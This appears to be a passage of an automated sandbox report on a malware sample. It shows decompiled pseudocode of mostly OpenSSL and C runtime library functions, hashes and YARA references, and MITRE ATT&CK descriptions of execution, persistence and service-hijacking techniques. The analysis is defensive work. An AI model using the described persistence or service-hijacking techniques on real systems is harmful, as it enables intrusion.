									__eax = E00454E50( *((intOrPtr*)(__esi + 0x14)), ".\\crypto\\asn1\\tasn_new.c", 0xa3);
									 *__edi = __eax;
									__eflags = __eax;
									if(__eflags == 0) {
										goto L41;
									} else {
										__eax = E0042B420(__eax, __ebp,  *((intOrPtr*)(__esi + 0x14)));
										goto L25;
									}
								}
							} else {
								_push(0);
								_push(__esi);
								_push(__edi);
								_push(0);
								__eax =  *__ebx();
								__esp = __esp + 0x10;
								__eflags = __eax;
								if(__eflags == 0) {
									L40:
									E004512D0(__ebx, __edx, __edi, __ebp, __eflags, 0xd, 0x79, 0x64, ".\\crypto\\asn1\\tasn_new.c", 0xdd) = E004702D0(__edi, __esi);
									__eax = 0;
									__eflags = 0;
									return 0;
								} else {
									__eflags = __eax - 2;
									if(__eax == 2) {
										goto L12;
									} else {
										goto L22;
									}
								}
							}
							goto L42;
						case 3:
							__eax =  *((intOrPtr*)(__esi + 0x10));
							__eflags = __eax;
							if(__eax == 0) {
								goto L12;
							} else {
								__eax =  *__eax;
								__eflags = __eax;
								if(__eflags == 0) {
									goto L12;
								} else {
									 *__edi = __eax;
									goto L11;
								}
							}
							goto L42;
						case 4:
							_t24 =  *((intOrPtr*)(_t33 + 0x10));
							if(_t24 == 0) {
								goto L12;
							} else {
								_t25 =  *((intOrPtr*)(_t24 + 4));
								if(_t25 == 0) {
									goto L12;
								} else {
									_push(_t33);
									_push(_t32);
									_t26 =  *_t25();
									goto L10;
								}
							}
							goto L42;
						case 5:
							L18:
							__eax = E0046FE00(__ebx, __edx, __edi, __ebp, __edi, __esi);
							L10:
							L11:
							if(_t26 == 0) {
								L41:
								E004512D0(_t30, _t31, _t32, _t34, __eflags, 0xd, 0x79, 0x41, ".\\crypto\\asn1\\tasn_new.c", 0xd6);
								__eflags = 0;
								return 0;
							} else {
								goto L12;
							}
							goto L42;
					}
				}
				L42:
			}

0x00470040
0x00470043
0x00470048
0x0047004d
0x0047005a
0x0047005a
0x0047005c
0x0047004f
0x0047004f
0x00470052
0x00470058
0x00000000
0x00000000
0x00470058
0x00470064
0x0047006a
0x0047006c
0x0047006c
0x00470072
0x00470078
0x004700a1
0x004700a7
0x0047007a
0x0047007a
0x00000000
0x004700bb
0x004700be
0x004700c0
0x00000000
0x004700c2
0x004700c4
0x00000000
0x004700c4
0x00000000
0x00000000
0x00470151
0x00470153
0x00470171
0x00470171
0x00470173
0x004701b0
0x004701b0
0x004701b3
0x004701b5
0x004701b8
0x004701de
0x004701de
0x004701e2
0x004701e4
0x00000000
0x004701ea
0x004701ea
0x004701ec
0x004701ed
0x004701ee
0x004701f0
0x004701f2
0x004701f5
0x004701f7
0x00000000
0x00000000
0x00000000
0x00000000
0x004701f7
0x004701c0
0x004701c0
0x004701c2
0x004701d1
0x004701d3
0x00000000
0x00000000
0x004701d5
0x004701d6
0x004701d9
0x004701dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004701dc
0x00000000
0x004701c0
0x00470175
0x00470182
0x0047018a
0x0047018c
0x0047018e
0x00000000
0x00470194
0x004701a8
0x00000000
0x004701ad
0x0047018e
0x00470155
0x00470155
0x00470157
0x00470158
0x00470159
0x0047015b
0x0047015d
0x00470160
0x00470162
0x00000000
0x00470168
0x00470168
0x0047016b
0x00000000
0x00000000
0x00000000
0x00000000
0x0047016b
0x00470162
0x00000000
0x00000000
0x004700d4
0x004700d6
0x004700f0
0x004700f0
0x004700f2
0x00470120
0x00470124
0x0047012c
0x0047012e
0x00000000
0x00470134
0x00470134
0x00470136
0x00470137
0x00470138
0x0047013a
0x0047013c
0x0047013f
0x00470141
0x00000000
0x0047014a
0x0047014a
0x00470150
0x00470150
0x00470141
0x004700f4
0x00470101
0x00470109
0x0047010b
0x0047010d
0x00000000
0x00470113
0x00470118
0x00000000
0x0047011d
0x0047010d
0x004700d8
0x004700d8
0x004700da
0x004700db
0x004700dc
0x004700de
0x004700e0
0x004700e3
0x004700e5
0x004701fd
0x00470214
0x0047021c
0x0047021c
0x00470222
0x004700eb
0x004700eb
0x004700ee
0x00000000
0x00000000
0x00000000
0x00000000
0x004700ee
0x004700e5
0x00000000
0x00000000
0x004700a8
0x004700ab
0x004700ad
0x00000000
0x004700af
0x004700af
0x004700b1
0x004700b3
0x00000000
0x004700b5
0x004700b7
0x00000000
0x004700b7
0x004700b3
0x00000000
0x00000000
0x00470081
0x00470086
0x00000000
0x00470088
0x00470088
0x0047008d
0x00000000
0x0047008f
0x0047008f
0x00470090
0x00470091
0x00000000
0x00470091
0x0047008d
0x00000000
0x00000000
0x004700cb
0x004700cd
0x00470093
0x00470096
0x00470098
0x00470223
0x00470233
0x0047023b
0x00470241
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0047007a
0x00000000

APIs

_memset.LIBCMT ref: 00470118
_memset.LIBCMT ref: 00470199

Strings

.\crypto\asn1\tasn_new.c, xrefs: 004700F9, 0047017A, 00470202, 00470228

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\asn1\tasn_new.c
API String ID: 2102423945-2878120539
Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t76;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t96;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr _t102;
				signed int _t105;
				signed int _t109;
				signed int _t113;
				intOrPtr _t118;
				intOrPtr* _t120;
				void* _t122;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t131;
				void* _t132;
				intOrPtr* _t142;
				signed int _t144;
				void* _t151;

				_t101 = __ebx;
				_t130 = _a12;
				_t142 = __ecx;
				if(_t130 == 0) {
					L13:
					_t64 =  *(_t142 + 0x10);
					_t109 = _a4;
					__eflags = _t64 - _t109;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L44;
					} else {
						_t122 = _t64 - _t109;
						_t109 = _a16;
						_push(_t101);
						_t105 = _a8;
						__eflags = _t122 - _t105;
						_t101 =  <  ? _t122 : _t105;
						_t73 = _t64 - _t101;
						_a8 = _t73;
						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
						if(__eflags <= 0) {
							L44:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t101);
							_push(_t142);
							_push(_t130);
							_t131 = _v20;
							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
								_t109 =  *_t109;
							}
							_t102 = _a12;
							__eflags = _t132 - _t102;
							_t144 =  <  ? _t132 : _t102;
							__eflags = _t144;
							if(_t144 == 0) {
								L51:
								_t67 = 0;
								__eflags = 0;
							} else {
								_t120 = _a8;
								while(1) {
									__eflags =  *_t109 -  *_t120;
									if( *_t109 !=  *_t120) {
										break;
									}
									_t109 = _t109 + 2;
									_t120 = _t120 + 2;
									_t144 = _t144 - 1;
									__eflags = _t144;
									if(_t144 != 0) {
										continue;
									} else {
										goto L51;
									}
									goto L52;
								}
								_t71 =  *_t109 & 0x0000ffff;
								__eflags = _t71 -  *_t120;
								asm("sbb eax, eax");
								_t67 = (_t71 & 0xfffffffe) + 1;
							}
							L52:
							__eflags = _t67;
							if(_t67 != 0) {
								L57:
								return _t67;
							} else {
								__eflags = _t132 - _t102;
								if(_t132 >= _t102) {
									__eflags = _t132 - _t102;
									_t63 = _t132 != _t102;
									__eflags = _t63;
									_t67 = 0 | _t63;
									goto L57;
								} else {
									_t69 = _t67 | 0xffffffff;
									__eflags = _t69;
									return _t69;
								}
							}
						} else {
							_t123 = _t122 - _t101;
							_v12 = _t123;
							__eflags = _t109 - _t101;
							if(_t109 < _t101) {
								_t88 =  *((intOrPtr*)(_t142 + 0x14));
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_a8 = _t142;
								} else {
									_a8 =  *_t142;
									_t130 = _a12;
								}
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_v8 = _t142;
								} else {
									_v8 =  *_t142;
								}
								__eflags = _t123;
								if(_t123 != 0) {
									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
									_t130 = _a12;
									_t151 = _t151 + 0xc;
									_t109 = _a16;
								}
							}
							__eflags = _t109;
							if(_t109 != 0) {
								L26:
								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_t113 = _a16;
									__eflags = _t101 - _t113;
									if(_t101 >= _t113) {
										_t107 = _a4;
									} else {
										_t82 =  *((intOrPtr*)(_t142 + 0x14));
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_t125 = _t142;
										} else {
											_t125 =  *_t142;
										}
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_a12 = _t142;
										} else {
											_a12 =  *_t142;
										}
										_t107 = _a4;
										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
										_t113 = _a16;
										_t151 = _t151 + 4;
									}
									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
										_t124 = _t142;
									} else {
										_t124 =  *_t142;
									}
									__eflags = _t113;
									if(_t113 != 0) {
										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
									}
									E00414DF0(_t142, _a8);
								}
							} else {
								__eflags = _t101;
								if(_t101 != 0) {
									goto L26;
								}
							}
							return _t142;
						}
					}
				} else {
					_t118 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t118 < 8) {
						_t96 = __ecx;
					} else {
						_t96 =  *__ecx;
					}
					if(_t130 < _t96) {
						goto L13;
					} else {
						if(_t118 < 8) {
							_t128 = _t142;
						} else {
							_t128 =  *_t142;
						}
						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
							goto L13;
						} else {
							if(_t118 < 8) {
								_t99 = _t142;
							} else {
								_t99 =  *_t142;
							}
							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
						}
					}
				}
			}

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

string too long, xrefs: 00417EE9
invalid string position, xrefs: 00417EDF

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 3212c22ca42dc8f76ade31907e0b7b7a5712c5f7dd988cb95cf67c5494a06c08
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 3212c22ca42dc8f76ade31907e0b7b7a5712c5f7dd988cb95cf67c5494a06c08
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004516A0(void* __ebx, void* __edi) {
				char* _t6;
				intOrPtr _t12;
				void* _t14;
				char* _t16;
				char** _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
				_t22 = _t21 + 0x10;
				if( *0x50b6d4 != 0) {
					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
					_t23 = _t22 + 0x20;
					__eflags =  *0x50b6d4;
					if( *0x50b6d4 != 0) {
						_push(__ebx);
						_push(__edi);
						_t12 = 1;
						_t16 = 0x5117e0;
						_t19 = 0x5113e4;
						do {
							__eflags =  *_t19;
							 *((intOrPtr*)(_t19 - 4)) = _t12;
							if(__eflags == 0) {
								_push(_t12);
								_t6 = E004C5D39(_t12, _t14, __eflags);
								_t23 = _t23 + 4;
								__eflags = _t6;
								if(_t6 != 0) {
									E004C5E00(_t16, _t6, 0x20);
									_t23 = _t23 + 0xc;
									_t16[0x1f] = 0;
									 *_t19 = _t16;
								}
								__eflags =  *_t19;
								if( *_t19 == 0) {
									 *_t19 = "unknown";
								}
							}
							_t19 =  &(_t19[2]);
							_t12 = _t12 + 1;
							_t16 =  &(_t16[0x20]);
							__eflags = _t19 - 0x5117d4;
						} while (_t19 <= 0x5117d4);
						 *0x50b6d4 = 0;
						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
					} else {
						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
					}
				} else {
					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
				}
			}

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x50ad20; // 0xa4c21a8c
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x510e38 = _t9;
				 *0x510e34 = _t23;
				 *0x510e30 = _t26;
				 *0x510e2c = _t22;
				 *0x510e28 = _t28;
				 *0x510e24 = _t27;
				 *0x510e50 = ss;
				 *0x510e44 = cs;
				 *0x510e20 = ds;
				 *0x510e1c = es;
				 *0x510e18 = fs;
				 *0x510e14 = gs;
				asm("pushfd");
				_pop( *0x510e48);
				 *0x510e3c =  *_t30;
				 *0x510e40 = _v0;
				 *0x510e4c =  &_a4;
				 *0x510d88 = 0x10001;
				_t14 =  *0x510e40; // 0x0
				 *0x510d44 = _t14;
				 *0x510d38 = 0xc0000409;
				 *0x510d3c = 1;
				 *0x510d48 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x50ad20; // 0xa4c21a8c
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x50ad24; // 0x5b3de573
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0042AB4B(_t19 << 0, "8\rQ");
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr _t22;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t32;

				_t18 = __ecx;
				_t25 = __ecx;
				_push(__edi);
				_t22 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t22 == 0) {
					L4:
					return _t25;
				} else {
					_t36 = _t22 - 0xffffffff;
					if(_t22 > 0xffffffff) {
						_push("vector<T> too long");
						E0044F23E(__eflags);
						goto L6;
					} else {
						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
						_t32 = _t32 + 4;
						if(_t15 == 0) {
							L6:
							E0044F1BB(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t25);
							_t27 = _t18;
							_t14 =  *_t27;
							__eflags = _t14;
							if(_t14 != 0) {
								_t14 = L00422587(_t14);
								 *_t27 = 0;
								 *((intOrPtr*)(_t27 + 4)) = 0;
								 *((intOrPtr*)(_t27 + 8)) = 0;
							}
							return _t14;
						} else {
							 *_t25 = _t15;
							 *((intOrPtr*)(_t25 + 4)) = _t15;
							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
							E0042B420(_t15, 0, _t22);
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
							goto L4;
						}
					}
				}
			}

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: e5c94bc44cf57a372b92b54ac174d1763daff5f3c1caf4189f35d58b11ed2149
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: e5c94bc44cf57a372b92b54ac174d1763daff5f3c1caf4189f35d58b11ed2149
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				void* _t13;
				intOrPtr* _t15;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;
				void* _t32;

				_t29 = _a4;
				_t10 =  *_t29;
				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
					_t31 = _t31 + 0xc;
				}
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
				_t26 = _a12;
				_t32 = _t31 + 8;
				_t28 = _t13;
				if(_t26 != 0) {
					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
				}
				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
				if(_t15 != 0) {
					 *_t15(_t29);
					E0047D100(_t29, 2);
					_t32 = _t32 + 0xc;
				}
				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
				return _t28;
			}

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

.\crypto\evp\digest.c, xrefs: 00480638
ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004242A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,00000000), ref: 004242B0
__invoke_watson.LIBCMT ref: 004242CC

Strings

0Ow`R, xrefs: 004242B0

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: DecodePointer__invoke_watson
String ID: 0Ow`R
API String ID: 4034010525-1688033838
Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

